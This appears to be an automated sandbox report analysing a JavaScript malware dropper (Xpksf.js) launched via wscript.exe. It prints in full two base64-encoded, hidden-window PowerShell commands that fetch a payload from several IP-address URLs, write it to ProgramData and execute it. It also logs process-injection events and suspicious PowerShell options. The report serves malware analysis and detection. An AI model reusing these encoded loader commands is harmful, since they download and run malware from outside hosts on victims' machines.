CQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA="
parent_process	wscript.exe	martian_process	powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA="
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Xpksf.js" Aquaphobia araneiformDustheap Denumeral AntipneumococcicNesotragus
parent_process	wscript.exe	martian_process	wscript "C:\Users\test22\AppData\Local\Temp\Xpksf.js" Aquaphobia araneiformDustheap Denumeral AntipneumococcicNesotragus

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3032 resumed a thread in remote process 2224
Process injection	Process 2224 resumed a thread in remote process 2372
NtResumeThread May 18, 2023, 9:25 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 2224	1	0	0
NtResumeThread May 18, 2023, 9:25 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2372	1	0	0

Creates a suspicious Powershell process (8 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Xpksf.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All